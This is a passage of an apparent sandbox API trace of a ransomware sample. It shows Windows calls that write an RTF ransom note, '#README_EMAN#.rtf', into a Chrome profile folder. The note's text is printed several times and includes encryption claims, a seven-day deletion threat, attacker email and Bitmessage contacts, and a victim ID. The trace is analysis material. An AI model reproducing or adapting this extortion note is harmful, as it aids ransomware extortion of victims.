\\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.835] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x245c778, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.835] WriteFile (in: hFile=0x2e8, lpBuffer=0x245c778*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x245c778*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.835] CloseHandle (hObject=0x2e8) returned 1 [0292.835] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\#readme_eman#.rtf")) returned 0xffffffff [0292.835] GetLastError () returned 0x2 [0292.835] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\_crx_aohghmighlieiainnegkcijnfilokake\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\web applications\\_crx_aohghmighlieiainnegkcijnfilokake\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0293.369] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 